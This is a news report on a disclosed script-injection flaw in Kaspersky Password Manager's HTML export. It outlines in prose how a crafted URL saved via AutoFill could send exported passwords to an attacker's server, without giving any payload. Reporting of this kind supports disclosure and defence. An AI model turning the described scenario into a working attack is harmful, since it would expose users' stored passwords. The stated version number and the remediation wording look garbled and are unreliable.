There is a medium severity software filter and validation vulnerability that affects Kaspersky’s Password Manager 18.104.22.168 and older variants.
The flaw allows a local attacker to inject malicious code during the exportation process of a database.
“The vulnerability is located in the validation of the html/xml export function/module & the bound vulnerable name, domain, url, comment (listing) parameters,” according to the advisory published by Vulnerability Lab.
“URLs of entries are embedded in the exported HTML file without encoding XML special characters, when the URL (domain) field of an entry contains a malicious script code, this will be executed when the exported HTML file is opened in a browser,” the report said.
If exploited successfully, the vulnerability can allow an attacker to persistently manipulate the application, phishing, the execution of malware, and even stealing the victim’s passwords in clear text. All these operations require only medium interaction on the user’s side.
The researchers also provide an example of an exploitation scenario in which the attacker sends the victim a cleverly crafted login page with a specific code in the URL’s parameters.
The victim can save the malicious login page to the application via the AutoFill plugin.
Later, when the victim attempts to export the file in HTML format using the standard template, the malicious script executes and the content of the file goes back to the server owned by the attacker.
For the time being, the issue remains unaddressed. The researchers recommend the use of XML special characters in item names in the exportation of content as an HTML file.